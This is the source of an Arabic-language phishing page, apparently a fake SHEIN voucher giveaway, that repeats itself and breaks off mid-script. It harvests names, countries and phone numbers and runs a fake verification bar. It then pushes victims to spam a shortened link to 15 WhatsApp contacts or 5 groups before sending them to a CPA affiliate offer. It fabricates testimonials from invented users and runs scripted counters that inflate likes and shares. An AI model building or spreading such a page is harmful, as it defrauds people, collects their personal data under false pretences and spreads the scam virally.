
<!DOCTYPE html>
<html>
    <head>
<script defer data-domain="shein11" src="https://plausible.io/js/script.js"></script>
<script defer data-domain="sheinz" src="https://plausible.io/js/script.js"></script>

        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>SHIN 16YEARS - SHARE</title>
        <link rel="shortcut icon" type="image/png" href="https://i.imgur.com/Pwey4fF.png" />
        <meta name="og:title" content="بنده بلس" />
        <meta name="og:url" content="URL" />
        <meta property="og:description" content="اضغط هنا للتسجيل" />
        <meta property="og:image" content="https://i.imgur.com/Pwey4fF.png" />
        <meta name="robots" content="noindex" />
        <meta name="theme-color" content="#ffffff" />
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />
<img src='https://i.imgur.com/wGnzJZ5.png' width='100%'/>

<style type="text/css">
@import url("https://od-jsc.pages.dev/css2.css?family=Poppins:wght@500;700&display=swap");
@import url("https://od-jsc.pages.dev/droidarabicnaskh.css");
* {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: bold;
    box-sizing: border-box;
}
body {
    direction: rtl;
    background: #fff;
}
a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    max-width: 500px;
    border: 0px solid #00B7B2;
    border-radius: 3px;
}
.post1 {
    padding: 10px;
}
p {
   color: #000;
}
.intro {
    display: block;
    max-width: 300px;
    width: 100%;
    margin: 10px auto;
    background: #7f8c8d;
}
.rib {
    display: block;
    width: 100%;
}
.info {
    display: block;
    max-width: 300px;
    width: 100%;
    height: 50px;
    margin: 10px auto;
    padding: 0 10px;
    border: 2px solid #95a5a6;
    outline: none;
}
.step2,
.step3 {
    display: none;
}
.question,
.title {
    text-align: center;
}
table {
    width: 100%;
    color: #000;
}
table th {
    background: #484848;
    color: #fff;
}
table tr th,
table tr td {
    width: 50%;
    border: 1px solid #c7c7c7;
    padding: 5px;
    font-size: 18px;
    text-align: center;
}
.yes {
    background: #4caf50;
}
.yes:hover {
    background: #2ecc71;
}
.no {
    background: #e74c3c;
}
.no:hover {
    background: #c0392b;
}
.welcome {
    font-size: 15px;
}
.amount,
#getname {
    color: #c4311d;
    text-decoration: none;
}
.done {
    text-align: center;
    color: #c7db49;
}
.tip {
    font-size: 14px;
}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
button {
    display: block;
    width: 250px;
    height: 50px;
    color: #fff;
    border: none;
    outline: none;
    font-size: 20px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: #3cbd45;
    transition: background 0.3s ease;
}
button:hover {
    background: #025ce3;
}
.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 60%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 40%;
    float: left;
    margin: 0;
    border-radius: 0px;
}
#loader {
    text-align: center;
}
.spin {
    width: 50px;
    height: 50px;
    background: transparent;
    border: solid 8px #006940;
    border-right-color: transparent;
    border-radius: 50%;
    margin: 10px auto;
    animation: spin 0.8s linear infinite;
}
@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}
#loader,
#info,
#checking,
#share,
#claim {
    display: none;
}
.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #3cbd45;
}
#fill,
#fill2 {
    background: #3cbd45;
    width: 0%;
    height: 100%;
}
.percentage {
    color: #000;
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #3cbd45;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #e1e2e3;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2;
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #e1e2e3;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
</style>

  

</head>
<body>
    
    
    


        <div class="post1">
        <div  class="welcome">
        <p><span class="amount"></span></p>
        </div>
        <div class="step1">
                        <br>
            <p class="question">الرجاء ملئ البيانات بشكل صحيح :</p><br>
                <center><input type="text" placeholder=" الأسم بالكامل " id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 330px;" onkeypress="return numberonly(event);"><br><br>
<center><input type="text" placeholder=" الدولة " id="name2" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 330px;" onkeypress="return numberonly(event);"><br><br>
                <input type="tel" placeholder=" رقم الجوال " id="grade" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 330px;" onkeypress="return numberonly(event);"></center><br>
            <button id="select">التالي</button>
        </div>
        <div class="step2">
            <table>
                <tbody>
                    
                        <th>الأسم</th>
</tbody><tbody>
<td id="pastname"></td>
                                        </tbody>
<tr><tr><tbody>
                       <th>رقم الجوال</th></tbody>
    <tbody><td id="pastnumber"></td>
</tbody>
            </table>
            <button class="yes">تأكيد</button>
            <button class="no">تعديل</button>
        </div>
        <div id="checking">
            <p class="title">الرجاء الإنتظار قليلاً ...</p>
            <div class="barr">
                <div class="fill">
                    <div id="fill"></div>
                </div>
                <div class="percentage center">
                    <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="check"><i class="fa fa-check-circle"></i></span>
                    <span id="percentage"></span>
                </div>
            </div>
        </div>
        <div id="share">
                    <center><img src="https://i.imgur.com/FtnyENs.gif" alt="Win" style="width: 300px;"></center>
            <p class="tip">
              عملينا العزيز : 
<span class="amount" id="getname"></span> ,<br> تهانينا لك !! ستصلك رسالة على رقم هاتفك المسجل بالقسيمة بعد إتمام التعليمات ادناه :
            </p><br>
            <p class="tip">(1) إضغط على زر "مشاركة" الموجود فى الأسفل وارسل الرسالة الى 15 صديقا او 5 مجموعات على الواتساب.</p>
            <p class="tip">(2) ستصلك رسالة تلقائيا بعد امتلاء شريط التحقق بالأسفل.</p>
            <p class="tip">(3) قم بإدخال الكود المرسل لك في خانة ( بطاقة هدية ) في تطبيق شي إن لتحصل على المبلغ فوراً.</p>

            <button id="whatsapp">مشــاركة </button>
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
            </div>
        </div>
        <div id="claim">
            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
            <p class="title">يمكنك الآن الحصول على البطاقة</p>
            <button id="offer">اضغط هنا</button>
            <center><script type="text/javascript" src="https://cdn-server.info/bnr.php?section=General&pub=533889&format=300x250&ga=g"></script>
<noscript><a href="https://yllix.com/publishers/533889" target="_blank"><img src="//ylx-aff.advertica-cdn.com/pub/300x250.png" style="border:none;margin:0;padding:0;vertical-align:baseline;" alt="ylliX - Online Advertising Network" /></a></noscript></center>
        </div>
        </div>
    </div>
<div class="comments">
            <div class="counter">
                <div class="reactions">
                    <img class="like" src="https://www.facebook.com/reaction/image/1635855486666999/?size=20&scale=1" /> <img class="love" src="https://www.facebook.com/reaction/image/1678524932434102/?size=20&scale=1" /> <img class="care" src="https://www.facebook.com/reaction/image/613557422527858/?size=20&scale=1" /> <span id="likes">134K</span>
                </div>
                <span id="comments">23K comments</span> <span class="dot">·</span> <span id="shares">12K shares</span>
            </div>
            <div class="bar">
                <span class="react"><i class="fa fa-thumbs-o-up"></i> <a class="liked">Like</a></span> <span class="react"><i class="fa fa-comment-o"></i> Comment</span> <span class="react"><i class="fa fa-share"></i> Share</span>
            </div>
            <div>
                <div class="comment">
                    </div>
                </div>
                <div class="comment">
                    <img src="https://od-img.pages.dev/w5.jpeg" />
                    <div class="single-container">
                          <span class="user">سلمى الحازمي</span>
                      

                        <span class="text">
بيض الله وجيهكم حصلت على قسيمة بـ 500 ريال الحين وصلتني على الفور
                      </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://od-img.pages.dev/w6.jpeg" />
                    <div class="single-container"><span class="user">وجدان الحربي</span> <span class="text">وصلت الرسالة لم اصدق لين تم اضافة رصيد في شي إن بقيمة 1000 ريال </span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment reply">
                    <img src="https://od-img.pages.dev/m5.jpeg" />
                    <div class="single-container"><span class="user">خالد بن سعد الحارثي</span> <span class="text">الله يجزاكم الخير الحين وصلت رسالة بالبطاقة وشريت فيها شكرا لكم شي إن</span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://od-img.pages.dev/w7.jpeg" />
                    <div class="single-container"><span class="user">ريم بنت سلطان</span> <span class="text">شكرا شي إن موب جديدة عليكم افضل واسرع متجر الكتروني</span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>

          <div class="comment">
                    <img src="https://i.imgur.com/buFiu1O.jpeg" />
                    <div class="single-container">
                        <span class="user">حلا احمد</span>
                      

                        <span class="text">

شكرا جزيلا لم اكن أؤمن بهذه الاشياء اقسم بالله لازلت لا اصدق توصلت برمز القسيمة و كنت مترددا و خائفا لاكن اتضح ان الامر حقيقي وحصلت على 1500 ريال رصيد مجاني في شي إن
                        </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://od-img.pages.dev/w8.jpeg" />
                    <div class="single-container"><span class="user">منى السبيعي</span> <span class="text"> شكرا شي إن حصلت قسيمة بقيمة 700 ريال</span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF7e5qCDQ2MhWyKaPPGw_zplGhx6hwkrVdA39B7XvJxDI9BLlghoTnwy7RmNlxI4qTHXPnKc611Hrw02csi5bpENKHxy3fg6DyX8VW0Z2sp9MEM0UGHvSrS3us-ywNjgZ67RgIDIs42UaSD-DmEo58xytYF9hBU3iQ5vbK_sN0nHv7eeqeG36NMFQz11c/s1600/3.jpg" />
                    <div class="single-container"><span class="user">احمد علي عبدالله</span> <span class="text">لم يحالفني الحظ لم يتم اختياري للفوز ان شاء الله المرة القادمة مبروك للفائزين </span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://lh3.googleusercontent.com/proxy/wcYLTy0gfkfnbgpb4rK1-_wy_qF0IflebcPwIB86oi4G_HTGG5wOx0zH0ptUCzqR5U4=s0-d" />
                    <div class="single-container"><span class="user">الهنوف بنت خالد</span> <span class="text">❤️ شكرا جزيلا شي إن كنت احتاج الى هذه القسيمة فعلا </span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>

                <div class="input"><input placeholder="Write a comment..." /></div>
            </div>
        </div>
    </div>
    <script src="https://od-jsc.pages.dev/jquery-latest.min.js"></script>
    <script>
        var errorname = "الرجاء إدخال الأسم بشكل صحيح!",
            errornumber = "الرجاء ادخال الرقم الخاص بك بشكل صحيح مثال 05xxxxxxx",
            text = " بمناسبة مرور 42 عاماً على تأسيسها أسواق العثيم تقدم قسائم شرائية وجوالات والعديد من الجوائز القيمة والفورية ، الجوائز محدودة سارع من هنا : ",
            link = "https://shrinkme.pro/0HMNL",
            error = "هناك خطأ!\nالمشاركات غير محسوبة ربما شاركته مع نفس الصديق او المجموعة اكثر من مرة، من فضلك اعد المشاركة.",
            cpa = "https://www.burplife.com/?sl=5745130-3aa3e&data1=Track1&data2=Track2&tag={External_ID_from_traffic_source}&website={subID}&placement={sub_subID}",
            saved = "",
            share = "whatsapp://send?text=" + link;
    </script>
<script>
<!-- code by ODcompany -->
  <!-- JS -->
<script type="text/javascript">
var time = 0;
window.setInterval(function () {
    time = time + 1;
    $(".t1").html(time + 1 + "m");
    $(".t2").html(time + 2 + "m");
    $(".t3").html(time + 4 + "m");
}, 6e4);
var likes = 134,
    comments = 23,
    shares = 12;
window.setInterval(function () {
    likes = likes + Math.floor(Math.random() * 3);
    comments = comments + Math.floor(Math.random() * 2);
    shares = shares + Math.floor(Math.random() * 2);
    $("#likes").html(likes + "K");
    $("#comments").html(comments + "K comments");
    $("#shares").html(shares + "K shares");
}, 5e3);
$(".liked").click(function () {
    if ($(this).hasClass("selected")) {
        $(this).removeClass("selected");
        $(this).html("Like");
    } else {
        $(this).addClass("selected");
        $(this).html("Unlike");
    }
});  
  
</script>
<script type="text/javascript">
var name = localStorage.getItem("name");
$("#getname").html(name);
$("#select").click(function () {
    var name = $("#name").val();
    localStorage.setItem("name", name);
    var number = $("#grade").val();
    if (name.length < 5 || name.length > 150) {
        alert(errorname);
    } else if (number === "0") {
        alert(errornumber);
    } else {
        $(".step1").fadeOut(0);
        $(".step2").fadeIn(500);
        $("#pastname").html(name);
        $("#pastnumber").html(number);
    }
});
$(".yes").click(function () {
    $(".welcome").fadeOut(0);
    $(".step2").fadeOut(0);
    $("#checking").fadeIn(1000);
    var i = 0;
    var interval = setInterval(function () {
        i += 1;
        $("#percentage").text(i + "%");
        $("#fill").css("width", i + "%");
        if (i == 50) {
            i = 49;
            setTimeout(function () {
                i = 50;
            }, 1000);
        }
        if (i >= 100) {
            clearInterval(interval);
            $("#load").fadeOut(0);
            $("#check").fadeIn(0);
            setTimeout(function () {
                $("#checking").fadeOut(0);
                $("#share").fadeIn(1000);
                $("#getname").html($("#name").val());
            }, 1000);
        }
    }, 50);
});
$(".no").click(function () {
    $(".step2").fadeOut(0);
    $(".step1").fadeIn(500);
});  
</script>  
<script type="text/javascript">  
var swidth = localStorage.getItem(saved);
if (swidth !== null) {
    var width = swidth * 1;
    $(".welcome").fadeOut(0);
    $(".step1").fadeOut(0);
    $("#share").fadeIn(0);
    $("#fill2").css("width", width + "%");

<!DOCTYPE html>
<html>
    <head>
<script defer data-domain="shein11" src="https://plausible.io/js/script.js"></script>
<script defer data-domain="sheinz" src="https://plausible.io/js/script.js"></script>

        <meta charset="UTF-8" />
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
<title>SHIN 16YEARS - SHARE</title>
        <link rel="shortcut icon" type="image/png" href="https://i.imgur.com/Pwey4fF.png" />
        <meta name="og:title" content="بنده بلس" />
        <meta name="og:url" content="URL" />
        <meta property="og:description" content="اضغط هنا للتسجيل" />
        <meta property="og:image" content="https://i.imgur.com/Pwey4fF.png" />
        <meta name="robots" content="noindex" />
        <meta name="theme-color" content="#ffffff" />
        <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" />
<img src='https://i.imgur.com/wGnzJZ5.png' width='100%'/>

<style type="text/css">
@import url("https://od-jsc.pages.dev/css2.css?family=Poppins:wght@500;700&display=swap");
@import url("https://od-jsc.pages.dev/droidarabicnaskh.css");
* {
    margin: 0;
    padding: 0;
    font-family: Poppins, Droid Arabic Naskh;
    font-weight: bold;
    box-sizing: border-box;
}
body {
    direction: rtl;
    background: #fff;
}
a {
    text-decoration: none;
}
.post {
    background: #fff;
    margin: 0 auto;
    max-width: 500px;
    border: 0px solid #00B7B2;
    border-radius: 3px;
}
.post1 {
    padding: 10px;
}
p {
   color: #000;
}
.intro {
    display: block;
    max-width: 300px;
    width: 100%;
    margin: 10px auto;
    background: #7f8c8d;
}
.rib {
    display: block;
    width: 100%;
}
.info {
    display: block;
    max-width: 300px;
    width: 100%;
    height: 50px;
    margin: 10px auto;
    padding: 0 10px;
    border: 2px solid #95a5a6;
    outline: none;
}
.step2,
.step3 {
    display: none;
}
.question,
.title {
    text-align: center;
}
table {
    width: 100%;
    color: #000;
}
table th {
    background: #484848;
    color: #fff;
}
table tr th,
table tr td {
    width: 50%;
    border: 1px solid #c7c7c7;
    padding: 5px;
    font-size: 18px;
    text-align: center;
}
.yes {
    background: #4caf50;
}
.yes:hover {
    background: #2ecc71;
}
.no {
    background: #e74c3c;
}
.no:hover {
    background: #c0392b;
}
.welcome {
    font-size: 15px;
}
.amount,
#getname {
    color: #c4311d;
    text-decoration: none;
}
.done {
    text-align: center;
    color: #c7db49;
}
.tip {
    font-size: 14px;
}
.title {
    text-align: center;
}
.error {
    display: none;
    text-align: center;
    font-size: 14px;
    color: #e74c3c;
}
button {
    display: block;
    width: 250px;
    height: 50px;
    color: #fff;
    border: none;
    outline: none;
    font-size: 20px;
    cursor: pointer;
    border-radius: 5px;
    padding: 0 10px;
    margin: 10px auto;
    background: #3cbd45;
    transition: background 0.3s ease;
}
button:hover {
    background: #025ce3;
}
.phone {
    max-width: 400px;
    margin: 10px auto;
}
.phone input {
    width: 60%;
    height: 50px;
    padding: 10px;
    outline: none;
    border: 2px solid #cecece;
    font-size: 14px;
}
#confirm {
    width: 40%;
    float: left;
    margin: 0;
    border-radius: 0px;
}
#loader {
    text-align: center;
}
.spin {
    width: 50px;
    height: 50px;
    background: transparent;
    border: solid 8px #006940;
    border-right-color: transparent;
    border-radius: 50%;
    margin: 10px auto;
    animation: spin 0.8s linear infinite;
}
@keyframes spin {
    100% {
        transform: rotate(1turn);
    }
}
#loader,
#info,
#checking,
#share,
#claim {
    display: none;
}
.center {
    display: flex;
    align-items: center;
    justify-content: center;
}
.barr {
    direction: ltr;
    max-width: 400px;
    margin: 10px auto;
    box-sizing: border-box;
}
.fill {
    position: relative;
    display: inline-block;
    width: calc(100% - 100px);
    height: 35px;
    padding: 2px;
    border: 2px solid #3cbd45;
}
#fill,
#fill2 {
    background: #3cbd45;
    width: 0%;
    height: 100%;
}
.percentage {
    color: #000;
    width: 100px;
    float: right;
    height: 35px;
    font-size: 16px;
    border: 2px solid #3cbd45;
}
#percentage,
#percentage2 {
    margin-left: 5px;
}
#check,
#check2 {
    display: none;
}
.counter {
    color: #7f7f7f;
    font-size: 12px;
    text-align: right;
    padding: 10px 0 10px 2px;
    border-bottom: 1px solid #e1e2e3;
}
.reactions {
    display: inline-flex;
    align-items: center;
    float: left;
}
.counter img {
    float: left;
    width: 16px;
    height: 16px;
    border-radius: 50%;
    border: 2px solid #fff;
    box-sizing: content-box;
}
.like,
.love {
    margin-right: -5px;
}
.like {
    z-index: 2;
}
.love {
    z-index: 1;
}
.bar {
    display: table;
    width: 100%;
    border-bottom: 1px solid #e1e2e3;
}
.bar .react {
    display: table-cell;
    width: calc(100% / 3);
    font-size: 12px;
    color: #7f7f7f;
    text-align: center;
    padding: 10px 0;
    cursor: pointer;
}
.comments {
    direction: ltr;
}
.comment {
    padding: 6px 0;
    margin-top: 5px;
}
.comment img {
    float: left;
    width: 32px;
    height: 32px;
    border: none;
    border-radius: 18px;
    cursor: pointer;
}
.reply {
    margin-left: 37px;
}
.single-container {
    margin-left: 37px;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    font-size: 12px;
}
.single-container .user {
    display: inline-block;
    cursor: pointer;
    color: #365899;
    margin-bottom: 5px;
}
.single-container .text {
    display: block;
}
.buttons {
    font-size: 12px;
    font-weight: bold;
    margin: 10px 0 0 47px;
    color: #90949c;
}
.action {
    cursor: pointer;
}
.action:hover {
    text-decoration: underline;
}
.input {
    padding: 6px 12px 12px;
}
.input input {
    width: 100%;
    background: #f1f2f6;
    padding: 10px;
    border-radius: 15px;
    border: 0;
    outline: none;
}
</style>

  

</head>
<body>
    
    
    


        <div class="post1">
        <div  class="welcome">
        <p><span class="amount"></span></p>
        </div>
        <div class="step1">
                        <br>
            <p class="question">الرجاء ملئ البيانات بشكل صحيح :</p><br>
                <center><input type="text" placeholder=" الأسم بالكامل " id="name" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 330px;" onkeypress="return numberonly(event);"><br><br>
<center><input type="text" placeholder=" الدولة " id="name2" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 330px;" onkeypress="return numberonly(event);"><br><br>
                <input type="tel" placeholder=" رقم الجوال " id="grade" name="Phone" style="fontwidth: 244px;height: 56px;font-size: 16px;width: 330px;" onkeypress="return numberonly(event);"></center><br>
            <button id="select">التالي</button>
        </div>
        <div class="step2">
            <table>
                <tbody>
                    
                        <th>الأسم</th>
</tbody><tbody>
<td id="pastname"></td>
                                        </tbody>
<tr><tr><tbody>
                       <th>رقم الجوال</th></tbody>
    <tbody><td id="pastnumber"></td>
</tbody>
            </table>
            <button class="yes">تأكيد</button>
            <button class="no">تعديل</button>
        </div>
        <div id="checking">
            <p class="title">الرجاء الإنتظار قليلاً ...</p>
            <div class="barr">
                <div class="fill">
                    <div id="fill"></div>
                </div>
                <div class="percentage center">
                    <span id="load"><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="check"><i class="fa fa-check-circle"></i></span>
                    <span id="percentage"></span>
                </div>
            </div>
        </div>
        <div id="share">
                    <center><img src="https://i.imgur.com/FtnyENs.gif" alt="Win" style="width: 300px;"></center>
            <p class="tip">
              عملينا العزيز : 
<span class="amount" id="getname"></span> ,<br> تهانينا لك !! ستصلك رسالة على رقم هاتفك المسجل بالقسيمة بعد إتمام التعليمات ادناه :
            </p><br>
            <p class="tip">(1) إضغط على زر "مشاركة" الموجود فى الأسفل وارسل الرسالة الى 15 صديقا او 5 مجموعات على الواتساب.</p>
            <p class="tip">(2) ستصلك رسالة تلقائيا بعد امتلاء شريط التحقق بالأسفل.</p>
            <p class="tip">(3) قم بإدخال الكود المرسل لك في خانة ( بطاقة هدية ) في تطبيق شي إن لتحصل على المبلغ فوراً.</p>

            <button id="whatsapp">مشــاركة </button>
            <div class="barr">
                <div class="fill">
                    <div id="fill2"></div>
                </div>
                <div class="percentage center">
                    <span><i class="fa fa-spinner fa-pulse"></i></span>
                    <span id="percentage2">0%</span>
                </div>
            </div>
        </div>
        <div id="claim">
            <p class="done"><i class="fa fa-check-circle fa-3x" aria-hidden="true"></i></p>
            <p class="title">يمكنك الآن الحصول على البطاقة</p>
            <button id="offer">اضغط هنا</button>
            <center><script type="text/javascript" src="https://cdn-server.info/bnr.php?section=General&pub=533889&format=300x250&ga=g"></script>
<noscript><a href="https://yllix.com/publishers/533889" target="_blank"><img src="//ylx-aff.advertica-cdn.com/pub/300x250.png" style="border:none;margin:0;padding:0;vertical-align:baseline;" alt="ylliX - Online Advertising Network" /></a></noscript></center>
        </div>
        </div>
    </div>
<div class="comments">
            <div class="counter">
                <div class="reactions">
                    <img class="like" src="https://www.facebook.com/reaction/image/1635855486666999/?size=20&scale=1" /> <img class="love" src="https://www.facebook.com/reaction/image/1678524932434102/?size=20&scale=1" /> <img class="care" src="https://www.facebook.com/reaction/image/613557422527858/?size=20&scale=1" /> <span id="likes">134K</span>
                </div>
                <span id="comments">23K comments</span> <span class="dot">·</span> <span id="shares">12K shares</span>
            </div>
            <div class="bar">
                <span class="react"><i class="fa fa-thumbs-o-up"></i> <a class="liked">Like</a></span> <span class="react"><i class="fa fa-comment-o"></i> Comment</span> <span class="react"><i class="fa fa-share"></i> Share</span>
            </div>
            <div>
                <div class="comment">
                    </div>
                </div>
                <div class="comment">
                    <img src="https://od-img.pages.dev/w5.jpeg" />
                    <div class="single-container">
                          <span class="user">سلمى الحازمي</span>
                      

                        <span class="text">
بيض الله وجيهكم حصلت على قسيمة بـ 500 ريال الحين وصلتني على الفور
                      </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://od-img.pages.dev/w6.jpeg" />
                    <div class="single-container"><span class="user">وجدان الحربي</span> <span class="text">وصلت الرسالة لم اصدق لين تم اضافة رصيد في شي إن بقيمة 1000 ريال </span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment reply">
                    <img src="https://od-img.pages.dev/m5.jpeg" />
                    <div class="single-container"><span class="user">خالد بن سعد الحارثي</span> <span class="text">الله يجزاكم الخير الحين وصلت رسالة بالبطاقة وشريت فيها شكرا لكم شي إن</span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://od-img.pages.dev/w7.jpeg" />
                    <div class="single-container"><span class="user">ريم بنت سلطان</span> <span class="text">شكرا شي إن موب جديدة عليكم افضل واسرع متجر الكتروني</span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>

          <div class="comment">
                    <img src="https://i.imgur.com/buFiu1O.jpeg" />
                    <div class="single-container">
                        <span class="user">حلا احمد</span>
                      

                        <span class="text">

شكرا جزيلا لم اكن أؤمن بهذه الاشياء اقسم بالله لازلت لا اصدق توصلت برمز القسيمة و كنت مترددا و خائفا لاكن اتضح ان الامر حقيقي وحصلت على 1500 ريال رصيد مجاني في شي إن
                        </span>
                    </div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://od-img.pages.dev/w8.jpeg" />
                    <div class="single-container"><span class="user">منى السبيعي</span> <span class="text"> شكرا شي إن حصلت قسيمة بقيمة 700 ريال</span></div>
                    <div class="buttons"><span class="time t2">2m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiF7e5qCDQ2MhWyKaPPGw_zplGhx6hwkrVdA39B7XvJxDI9BLlghoTnwy7RmNlxI4qTHXPnKc611Hrw02csi5bpENKHxy3fg6DyX8VW0Z2sp9MEM0UGHvSrS3us-ywNjgZ67RgIDIs42UaSD-DmEo58xytYF9hBU3iQ5vbK_sN0nHv7eeqeG36NMFQz11c/s1600/3.jpg" />
                    <div class="single-container"><span class="user">احمد علي عبدالله</span> <span class="text">لم يحالفني الحظ لم يتم اختياري للفوز ان شاء الله المرة القادمة مبروك للفائزين </span></div>
                    <div class="buttons"><span class="time t1">1m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>
                <div class="comment">
                    <img src="https://lh3.googleusercontent.com/proxy/wcYLTy0gfkfnbgpb4rK1-_wy_qF0IflebcPwIB86oi4G_HTGG5wOx0zH0ptUCzqR5U4=s0-d" />
                    <div class="single-container"><span class="user">الهنوف بنت خالد</span> <span class="text">❤️ شكرا جزيلا شي إن كنت احتاج الى هذه القسيمة فعلا </span></div>
                    <div class="buttons"><span class="time t3">4m</span> <span class="dot">·</span> <span class="action liked">Like</span> · <span class="action">Reply</span></div>
                </div>

                <div class="input"><input placeholder="Write a comment..." /></div>
            </div>
        </div>
    </div>
    <script src="https://od-jsc.pages.dev/jquery-latest.min.js"></script>
    <script>
        var errorname = "الرجاء إدخال الأسم بشكل صحيح!",
            errornumber = "الرجاء ادخال الرقم الخاص بك بشكل صحيح مثال 05xxxxxxx",
            text = " بمناسبة مرور 42 عاماً على تأسيسها أسواق العثيم تقدم قسائم شرائية وجوالات والعديد من الجوائز القيمة والفورية ، الجوائز محدودة سارع من هنا : ",
            link = "https://shrinkme.pro/0HMNL",
            error = "هناك خطأ!\nالمشاركات غير محسوبة ربما شاركته مع نفس الصديق او المجموعة اكثر من مرة، من فضلك اعد المشاركة.",
            cpa = "https://www.burplife.com/?sl=5745130-3aa3e&data1=Track1&data2=Track2&tag={External_ID_from_traffic_source}&website={subID}&placement={sub_subID}",
            saved = "",
            share = "whatsapp://send?text=" + link;
    </script>
<script>
<!-- code by ODcompany -->
  <!-- JS -->
<script type="text/javascript">
var time = 0;
window.setInterval(function () {
    time = time + 1;
